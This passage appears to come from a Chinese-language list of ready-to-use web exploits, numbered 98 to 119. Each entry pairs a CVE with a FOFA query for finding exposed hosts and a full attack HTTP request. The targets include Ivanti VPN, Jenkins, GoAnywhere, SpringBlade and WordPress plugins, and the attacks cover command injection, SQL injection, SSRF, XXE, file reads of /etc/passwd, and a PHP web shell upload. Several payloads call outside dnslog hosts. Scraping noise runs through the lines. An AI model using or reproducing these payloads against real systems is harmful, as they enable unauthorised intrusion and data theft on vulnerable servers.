Connection: close
5 ]* p( F: u8 f( B' F$ {5 {Cookie: rememberMe=PAYLOAD
, r% {" R6 u& G( {$ @; VX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
% d" m( S( ~6 B/ R4 R$ e$ F; S9 N* h" P5 D" H2 M

  o' ]6 J; y0 ?$ }+ @98. SpiderFlow爬虫平台远程命令执行8 _& P; _5 G( L- v, z
CVE-2024-0195
. E0 ]" g8 @% k% OFOFA:app="SpiderFlow"
* E2 g8 j, Z5 e0 m: d- a4 ~POST /function/save HTTP/1.1
# w+ [! _) @  tHost: 192.168.40.130:8088/ b. f2 ?( f5 [/ T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( S2 z9 ]! u. F. AConnection: close
7 ?4 l: ?5 E) X; U0 L  T: yContent-Length: 121! J( s4 D7 y$ Q
Accept: */*
& G) f) {. Y$ nAccept-Encoding: gzip, deflate+ x0 F5 w9 h% Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 }$ k9 a2 x, n* t
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
6 v1 q( `1 k" e* m' @X-Requested-With: XMLHttpRequest
8 W: }" a6 n. S: {! E; S
5 s6 z8 ]  P: Z  p, c: vid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
: ~' p9 N6 X( i
2 p, S" a8 z& d' B/ L. y5 ?6 D" E7 T0 L# b* m
99. Ncast盈可视高清智能录播系统busiFacade RCE
; {1 J# Z6 ~% J* Z; }CVE-2024-0305. w. I3 @0 D& p, v7 _( D/ K% S* `/ b
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
' U- F7 |1 S* L) p, a1 q$ h! MPOST /classes/common/busiFacade.php HTTP/1.19 _# \0 N0 \3 B+ J
Host: 192.168.40.130:8080
1 U- N" z5 _- h- L" }) Z& EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' O' _, X+ A( c# a
Connection: close- V; D4 d& ^4 w& A! s3 U
Content-Length: 154
+ g& {! q+ f, s6 @: oAccept: */*
! `0 \9 _0 i0 n% i# [9 W/ O( pAccept-Encoding: gzip, deflate
( ~9 A9 }% Z6 c0 [: t0 P5 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: o3 @6 J3 j; C+ R: ?3 _8 B5 hContent-Type: application/x-www-form-urlencoded; charset=UTF-88 S0 t! p. O+ f" G" V& k; Y
X-Requested-With: XMLHttpRequest
' r( o; a- |5 m0 C6 O
+ G) \- k5 M* F+ \- D/ G' q%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
$ q, ~1 c- I6 |: A( h; [* {2 g
2 ]7 M2 q, ?( ^* J
( k% h0 Y. `8 z: F: I5 ^100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传3 u( d* N! @  U2 j6 J4 {7 C
CVE-2024-0352
8 a, ]" g! b1 M2 y: JFOFA:icon_hash="874152924"- w( \$ K3 L) P' d4 @7 O2 y/ q- @* q
POST /api/file/formimage HTTP/1.1
' v& V) v1 N  f' D/ A$ h) ^! M) IHost: 192.168.40.1302 v! F; L) m2 W( q% Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
3 S' a1 `2 p. d' V0 I2 s+ b$ ZConnection: close8 |0 E2 {* t- T6 [: J
Content-Length: 201
6 N$ ~8 s/ n+ \4 U! B+ Z4 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
' q2 G# A8 B5 ?' JAccept-Encoding: gzip% C& ~/ i& I, c$ l* l
' u6 Y9 h* z% d2 ?, y0 d9 B
------WebKitFormBoundarygcflwtei
3 ]4 }5 Q* f4 n8 F( ]Content-Disposition: form-data; name="file";filename="IE4MGP.php"
$ I; U. h2 u( u& XContent-Type: application/x-php
4 m2 ]: `7 Q5 ^5 V7 m% K8 L; n( J5 q( p
2ayyhRXiAsKXL8olvF5s4qqyI2O
7 ^; o2 a. V% [2 B; k5 F5 h. W------WebKitFormBoundarygcflwtei--+ A& {+ N2 u( @0 S6 E5 o

! r2 D6 e$ r7 x6 A+ J6 w( w+ q/ d$ y, ?  q8 b
101. ivanti policy secure-22.6命令注入5 b" i8 u' l# _; o5 }  \
CVE-2024-21887* n% V9 a1 W6 G: K( D+ V
FOFA:body="welcome.cgi?p=logo"
7 a; k" n& ]3 q, eGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
5 L6 E$ X, t5 G4 ?1 \) SHost: x.x.x.xx.x.x.x' l& _! t/ F* O: r6 {* t, G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 K. U/ Q9 k' j- u. _: d! u- C1 d6 sConnection: close, N) W2 [8 G) }2 z; @
Accept-Encoding: gzip" I/ w$ |& [% |( F: ?) x& Y

& x1 {8 J/ J0 b+ a9 w
! u' u" y/ x/ j/ }0 V: u* ~102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
* d- C( f: k& r9 i0 s9 \; P3 G) BCVE-2024-21893% u  E) ~; @& M% T0 Q/ M" ?4 W9 T3 @, I
FOFA:body="welcome.cgi?p=logo"0 N: L. E" B: ?1 C
POST /dana-ws/saml20.ws HTTP/1.1) z# j2 Y" A) @& |0 {
Host: x.x.x.x$ m0 S* [( |8 w! F# Z9 d" o. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* F7 D, l" L; P. G% o: \$ c4 G
Connection: close
' r; p& |, e( T) ?: NContent-Length: 792
" K( ~) ^# u6 f: W6 V# q: f( t: nAccept-Encoding: gzip2 P- F/ Q, x6 k# L- P4 E$ z
# z# n/ j% e- @* i, O  d
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope># ]+ t$ ]% L  l4 w

8 m1 g. g  s( E& ]103. Ivanti Pulse Connect Secure VPN XXE
3 S5 d5 W4 a& A( Y2 m5 v6 oCVE-2024-22024
$ s4 X2 q+ b, ?+ t, k) DFOFA:body="welcome.cgi?p=logo"
! b: D- N5 P, @4 W+ QPOST /dana-na/auth/saml-sso.cgi HTTP/1.1- M7 h' a) M+ U6 }# S
Host: 192.168.40.130:111
6 W/ {2 l- N* ?( p4 PUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.361 l! f: v9 a: J% U" P
Connection: close0 C9 y9 C% v" _" x1 K* M  \* {
Content-Length: 204
, U5 M" E* w* R! e( ZContent-Type: application/x-www-form-urlencoded
% x$ k0 x' }/ }2 T- x% j7 EAccept-Encoding: gzip
* f7 |1 S( O/ q# f, u. N5 _7 J7 Q5 y0 N, s
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
& H( J% ]7 ~/ ?$ v
" J( P! O  S3 i) ]$ g9 T8 Y9 G# D; p5 L* T/ p9 U: u
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
" V4 A+ v+ @$ b# ]<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>. {8 ]7 j, j7 o5 d+ F

' L! G6 T: V4 T
9 B+ l$ r9 f: R6 p, I104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: {& a$ P- ^. SCVE-2024-0569. e, k! s* A6 r2 N! _6 y( s" f
FOFA:title="TOTOLINK"
* \7 |; U+ m# m# k# CPOST /cgi-bin/cstecgi.cgi HTTP/1.1
: X1 |+ O' o7 B$ {9 s) `4 n. I% cHost:192.168.0.1
9 J) x' c7 _' A& }$ {4 }) ?Content-Length:41" _/ R9 W4 ^( L
Accept:application/json,text/javascript,*/*;q=0.016 ]4 E' y0 y7 H# Z( n
X-Requested-with: XMLHttpRequest
( @- B# \  @- `4 q9 x+ L8 DUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
% U4 {, r; c! ^& m! y' S4 LContent-Type: application/x-www-form-urlencoded:charset=UTF-8) Z9 K( }, a7 v9 f/ j2 W2 T7 X* Z: Q3 r
Origin: http://192.168.0.1
) z% R% L. k( t2 y7 XReferer: http://192.168.0.1/advance/index.html?time=1671152380564
8 O# {. I; y( t( E6 l; K& tAccept-Encoding:gzip,deflate& ~: k8 j, F, I/ i, p
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 X& G5 r6 E" y8 K& `3 }Connection:close& L9 J( }/ h, G& `) i! Y9 m& i  \

$ Q1 t2 j# }& {! G1 ~  r{. S* Y5 q( c5 V' G( ?. ?. L
"topicurl":"getSysStatusCfg",+ F$ ]4 ^. q7 q# }4 _; J
"token":""7 L3 X, A* w& R
}
1 }0 _1 [" U3 q2 E- r2 b; Q, J! I& E  m7 {
105. SpringBlade v3.2.0 export-user SQL 注入) `; p& @: o, V8 @3 G
FOFA:body="https://bladex.vip"/ X. ~+ o/ E( d9 u& I" N. n8 p, T
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
* g: F9 W, Y; |0 t; @1 J0 N
9 t; f, a: Q$ |6 y) {* h106. SpringBlade dict-biz/list SQL 注入+ Y6 O! k6 v! \- L
FOFA:body="Saber 将不能正常工作"" \8 H, c- g' D; y( @0 b
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1, ^( p- _. g. O3 d, R
Host: your-ip
6 U. d2 f) ?+ ]9 Q# h$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( T3 C* w: ~% i. M8 pBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A  B) `1 S9 C: b7 m
Accept-Encoding: gzip, deflate- k3 T7 L- S/ |5 B8 l  P! j
Accept-Language: zh-CN,zh;q=0.9
4 `1 O* D8 a1 F, h& TConnection: close# `/ E8 _' i7 q4 |

. E9 w) Q# m% ?: {6 R
& C8 _  }; `' W. X. Y107. SpringBlade tenant/list SQL 注入* U* b2 n+ ~$ |$ Q
FOFA:body="https://bladex.vip"
+ E# ]9 S: X! L$ |6 cGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
+ Z# b% u8 C; `4 X% ]( U4 f" ]5 UHost: your-ip
$ M2 s# z! _' n1 _  G& u' v" u5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  J  _( i6 Z- S2 l& F: EBlade-Auth:替换为自己的$ r% c) t+ N, E2 j9 c1 R7 y
Connection: close
) \/ p- l& B( Y  I' P% g+ v& \8 F
3 u* f. o2 |* @) c
0 e) t3 u3 ?# f$ p4 ?8 c' ^108. D-Tale 3.9.0 SSRF; Z# I4 U! S2 |5 V# k
CVE-2024-21642
* N; J, L3 @. c' |FOFA:"dtale/static/images/favicon.png"8 ?  D. ^' }4 ]7 D  ~. L
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
# s" p0 q' k9 T/ E7 @5 k5 W5 d, }Host: your-ip* ~* b; E* ^. J  H5 e  Q
Accept: application/json, text/plain, */*  r2 e7 a5 p1 C' T5 w7 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- R+ N1 a8 k0 p* ^+ h. J) i  v
Accept-Encoding: gzip, deflate
2 L* A3 A( i" x8 zAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
$ ]; H9 a2 i8 U1 Y, N. R" FConnection: close
- a0 ^4 e( k% U. A$ S2 s# Z
& h3 Y3 T" t' S  U5 S7 u# y% E% a
% m! s4 E8 c2 ]' _# r* z109. Jenkins CLI 任意文件读取
  {/ v6 R7 O: ^/ ^: y7 fCVE-2024-238979 B5 q5 o9 i! N* D1 l/ x
FOFA:header="X-Jenkins"
! @2 k" k  L% g  I! d2 pPOST /cli?remoting=false HTTP/1.1
* X3 t: R, V" Q* M( a% d( NHost:
4 _  `# n$ O3 V2 mContent-type: application/octet-stream
8 q3 G2 W" j4 x% z; [& VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; n4 [( g% Z3 M
Side: upload! Y, [4 [) w9 s
Connection: keep-alive0 ^9 p1 f5 k2 G. `( o9 m6 M. `
Content-Length: 163; r7 K5 ?1 b' `. ^
" L& k- w9 @9 e) X
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
- f, ?/ E- N8 Q9 i  w. X$ o* Y
/ ]/ P# h7 S" u& |2 R* X' G) }. y
( P; {# ?2 L: E: |, }) D  c- _POST /cli?remoting=false HTTP/1.1# f. c. W1 y5 o
Host:
" A- g3 X) H! T, JSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; @0 }" _7 q; n0 z9 e" |
download- `! X  ~; G/ q4 @2 a) x* G
Content-Type: application/x-www-form-urlencoded& K2 \9 d# v4 ]! }
Content-Length: 02 g2 ]! U" C* J- `! V: x$ e

- e1 d( f! C% X) r  E6 {8 ^, T6 k( t- L
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin1 b) k. H: c9 `' h/ G9 y* u3 L
java -jar jenkins-cli.jar help4 Y6 y7 Y* @  E
[COMMAND]# s5 |. m+ r0 B: b2 D
Lists all the available commands or a detailed description of single command.
# r; o( m7 J$ R5 e) ` COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
) V' ]* S+ I8 J# c& l
7 B4 b$ p, R2 F' g0 b: }: V; z. L: Y) q& B% _& M- @3 k$ z
110. Goanywhere MFT 未授权创建管理员
2 E* q6 @; t4 L1 eCVE-2024-0204$ }5 [6 q7 `3 p$ ]) t
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
7 C% r  \& S4 z/ oGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
  {6 K8 S! ?* `( f! zHost: 192.168.40.130:8000
5 h7 E1 _3 j; a7 G# h, BUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36; X( L% E; t  c5 v' R- C
Connection: close( ^9 ?7 S! W2 ~/ X* m% f6 r5 `$ l
Accept: */*7 |# \! n) d; a: S# h. u
Accept-Language: en+ d$ G! N* G- i9 D3 @9 {
Accept-Encoding: gzip! J% `" C! m0 v+ ]1 b& O
" |% ^6 @. \& a* D  ^) Y) r
! `7 {" w+ u& i, l1 J
111. WordPress Plugin HTML5 Video Player SQL注入; w! i9 c% k8 p+ ^6 I" E' k
CVE-2024-1061
0 w9 ]. Z4 R2 ^4 vFOFA:"wordpress" && body="html5-video-player"
6 B" Q" H% [  C* HGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1. E' I4 u$ U+ G5 m* g
Host: 192.168.40.130:112
; k% r8 L5 f. ]+ e) }! R; n9 I6 K" jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# C! q6 X# N& w9 _) V1 `Connection: close& i) G# _. m; E2 W( p
Accept: */*
9 \, n2 Q) R7 _* QAccept-Language: en
" c, M% J+ u) v3 h, gAccept-Encoding: gzip- _, _( o# v. h0 i5 j) T
8 w/ K9 e3 ?& L

8 H9 f( d4 I8 B112. WordPress Plugin NotificationX SQL 注入
# X" l1 I" B5 yCVE-2024-1698: R4 Y  n& [$ f2 V; ^3 G
FOFA:body="/wp-content/plugins/notificationx"3 q* Z# d8 l6 N* K; _
POST /wp-json/notificationx/v1/analytics HTTP/1.1$ c2 ^5 C, f% I
Host: {{Hostname}}* P" n. T9 G+ C: J5 i& x3 j
Content-Type: application/json
4 O3 e7 ]+ v3 s* V6 u# y) V3 o, v! e8 [
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
3 F3 p0 s. |; v% I% ?( e( W
  ~7 B/ S! f+ Y5 a$ y' h) ^
5 B% c$ |- ?2 B+ [113. WordPress Automatic 插件任意文件下载和SSRF% @6 @; H8 c- d/ u
CVE-2024-27954
$ U/ D2 j& H. o- T6 @FOFA:"/wp-content/plugins/wp-automatic"
  i& ]' u6 \' {* Z0 I( L, G1 Z. GGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
( A7 k& g- i, X* d- a4 rHost: x.x.x.x  M! R# w0 U' @1 d. o3 j! o
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
' Y. d5 u* ]* c. [* EConnection: close2 E8 U( Q& m3 B/ {
Accept: */*  e& I* e6 }. F, R/ U
Accept-Language: en
9 W8 O# q& A. H% FAccept-Encoding: gzip
$ \. M; d+ c* o
7 t7 J! E  \+ e# f8 Y6 g# S* Y
! g% `. }( t- O+ ~" O114. WordPress MasterStudy LMS插件 SQL注入' r. g* P9 S0 d7 U
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"+ B3 j! w- o) _5 ?/ g( S, M
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.17 B7 V* ^' I$ C7 `( F5 W" K
Host: your-ip: L) q, f; {4 R
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' a) L) J( t1 F' jAccept-Charset: utf-8
  E7 }. c+ H% f; _0 j4 XAccept-Encoding: gzip, deflate! y0 R& t  b, Z, F* r  w
Connection: close
5 F5 C; g6 I. G2 R- ~! g. @: k& [3 G* j% c0 _; ]" e% }

# d" ^4 w' x( c0 w1 S115. WordPress Bricks Builder <= 1.9.6 RCE
7 j! s4 t  r1 s& N, l8 H2 vCVE-2024-25600+ u2 A0 _% X- L% Y% }- \
FOFA: body="/wp-content/themes/bricks/"
+ K' {! N: d- R2 L: L) v  W第一步,获取网站的nonce值
# q, m: I/ P+ g7 [. n5 C8 lGET / HTTP/1.1
6 @$ t1 J6 W! X6 U$ N5 W9 RHost: x.x.x.x9 s5 C8 E" E& O  a; E4 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- y( d+ q2 Q. |8 g& i
Connection: close/ ?$ ?2 v# d0 l1 y
Accept-Encoding: gzip3 N7 f3 {# q' A7 O: K% w0 P
2 g7 l0 l+ B; U! i2 O

! T8 o+ f2 n+ X6 r第二步替换nonce值,执行命令. o2 d6 `) u: J/ X; X, h5 l. T
POST /wp-json/bricks/v1/render_element HTTP/1.18 G0 ~" Y: n4 p/ s0 {6 _4 ~
Host: x.x.x.x
4 ]' e4 P0 h; I$ H& e( yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 |* O* \7 c4 g3 X2 a
Connection: close2 Q- k) Q$ g6 Y8 \. {
Content-Length: 356' c6 n4 h! r0 l
Content-Type: application/json# ^: c1 S1 L; ^0 p! ?) M: F' C
Accept-Encoding: gzip6 a1 Y$ {' o3 t; H% s% g1 n$ x
( G$ Q6 w. D$ p% _+ j$ p
{
- K* ?* x6 ~( C/ |* g- @"postId": "1",
' i' C  s- X1 w) f  "nonce": "第一步获得的值",
; {9 ~2 i' N$ `' G- Y  "element": {! ~& _5 D7 z' @8 a# _2 `
    "name": "container",9 q; m2 m6 E& E: i/ T4 Z& b+ k
    "settings": {
2 N# t% r, t9 f( X+ j3 `7 X! c: l# A      "hasLoop": "true",5 ~7 g( b' u" B+ u; w- k
      "query": {
6 h* l+ `" F9 T0 l! ~$ U        "useQueryEditor": true,6 e' Z3 l: T5 X. u
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 @9 A9 F4 v2 W: P6 }# y; R9 e6 N        "objectType": "post"/ x: c& C% Y* b
      }
/ `/ w- z/ l' r9 \* B    }9 c/ e  S" J# M
  }
0 P$ _0 v0 _+ Z3 e( c" ~+ x}- s. i/ M3 Q+ v  h! j
# Y3 A, i; ?- X0 t6 r( e* i
6 K. T2 ^7 k, a& ^
116. wordpress js-support-ticket文件上传
$ m/ ^* ]$ u8 sFOFA:body="wp-content/plugins/js-support-ticket"% p2 D" ^1 r' e3 Q3 [
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
  B% h, Q% B/ L: O3 [) Q- JHost:  R* I8 e) o3 P! p: S5 `* w
Content-Type: multipart/form-data; boundary=--------7670991715 S8 i/ t3 [+ d/ V7 i
User-Agent: Mozilla/5.0
2 M8 r2 c# {4 {: p/ D# w6 B& H
7 u; U  x  n2 ~----------767099171
4 H8 }8 a6 @+ R" F& y0 s' IContent-Disposition: form-data; name="action"
. D6 A" I# Q, Kconfiguration_saveconfiguration
% N: f0 l" o: x----------767099171& F, o  D8 ^6 ?1 A; E
Content-Disposition: form-data; name="form_request"
5 r3 y: ^/ K0 [jssupportticket
- J) k+ m  y& q3 ^$ G- A* A----------7670991711 X" d7 u* `* u5 Y
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
; X6 }! K5 Q- w! r) H8 MContent-Type: image/png7 Q9 [9 h" T; K8 S7 V9 x
----------767099171--
. h' }3 m+ T# r7 d) u/ K
, n% V; g7 ^6 B  V& p( N% x% t9 Z- V6 k" U" ?! x. q9 i
117. WordPress LayerSlider插件SQL注入0 D, @9 ?) y4 t" l' L: l$ y
version:7.9.11 – 7.10.0
+ N% G: F) d- W2 n3 m$ i- y& W. cFOFA:body="/wp-content/plugins/LayerSlider/"
- @. ]2 R! ]5 o& Y) f( hGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.12 e- o+ n0 _  y$ G# N% J! Z# N* s
Host: your-ip6 V0 b" Y  ?: b& L: }% U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& Y5 d' O7 s5 H; i& E2 T, e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  }. h/ E, ?- J! gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  B9 y$ M$ ]+ W) \+ U4 ]Accept-Encoding: gzip, deflate, br
; j% N& S$ R! U$ i* N, u  H, ~Connection: close- y  Y$ i0 |' T7 k0 k
Upgrade-Insecure-Requests: 14 |) H! h7 Q/ _' |+ F- Q
. y# e7 w. s2 P; @2 U5 \0 i
  o! f; l, r$ `6 r1 Q3 b, f! P
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传) U( k4 R0 g# z
CVE-2024-0939
* l+ @6 m. K; J2 SFOFA:title="Smart管理平台"
+ C6 O4 ?. U+ ]! RPOST /Tool/uploadfile.php? HTTP/1.1
8 e5 ?, m" v/ \/ gHost: 192.168.40.130:8443* Q: Q0 I  r1 x; p  `
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8, F; H) q# I, @( r7 x% v9 N( `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
' O$ \; B8 |- J3 F" ~0 M  O2 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 q' y# p# _6 J) J. r( z6 U% l( t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 K  {8 x6 P8 \
Accept-Encoding: gzip, deflate! p& ?5 c, M$ s8 ?, F
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
5 @; \( D- H4 pContent-Length: 405
6 _& O& m: f& U# ^7 n* k1 s( `; mOrigin: https://192.168.40.130:8443+ }( U1 S  u! |! U
Referer: https://192.168.40.130:8443/Tool/uploadfile.php9 h* `( D& s$ v5 D: X3 e& Z, P
Upgrade-Insecure-Requests: 1
5 W5 H2 v! K0 `( A$ D# gSec-Fetch-Dest: document' V0 c" O. }7 y- Y  z- u
Sec-Fetch-Mode: navigate
4 {  ?( D/ ~; E) K  O8 }5 k( BSec-Fetch-Site: same-origin6 i9 V' Q6 y/ q. g
Sec-Fetch-User: ?1
$ E$ L+ M  Z/ {Te: trailers, s( Z) G1 b" ?6 H& q6 m
Connection: close$ _; O+ k' S1 |" d4 W: L" }: g

/ z5 x. l8 W5 P4 c9 B, j$ u6 G" ^-----------------------------13979701222747646634037182887: A: N* {2 H% R, n' ?
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
0 m6 n: r7 q7 [$ Z8 f* O/ B4 X# ^Content-Type: application/octet-stream$ @/ ?% Q0 j% e* U  G

# E7 c* W/ T. z0 z* @8 M<?php# ^9 O0 Q; y  G: w' J8 e
system($_POST["passwd"]);( D, Y9 Y5 A0 m. U0 h  v# \1 V
?>
) n6 U" w2 ~# u( X-----------------------------13979701222747646634037182887$ O5 @9 p# l! W* [
Content-Disposition: form-data; name="txt_path"
( L4 @' L3 l% g. q
5 O: {# ~8 |5 k8 Z  S( E- z/home/src.php+ R, x' {; F" _+ U: w/ `* q
-----------------------------13979701222747646634037182887--3 b/ P8 c8 C# q( Z% p+ ]
! Z- y1 \" u6 ?9 Z

& c+ k! Q6 ^+ v4 c/ ~访问/home/src.php+ X& l& E8 W) E/ l1 N# ]8 M

6 g/ F0 |+ j- l$ ~119. 北京百绰智能S20后台sysmanageajax.php sql注入
+ d6 b6 g' r: h0 s4 C4 l; fCVE-2024-1254$ J: Z7 N8 d5 E9 h7 @8 V, E6 y0 z
FOFA:title="Smart管理平台"
8 e1 D# O, r: R9 @. Y先登录进入系统,默认账号密码为admin/admin* J8 Q. i* `( }, R
POST /sysmanage/sysmanageajax.php HTTP/1.119 R: r$ R" C0 v9 p3 m) s
Host: x.x.x.x
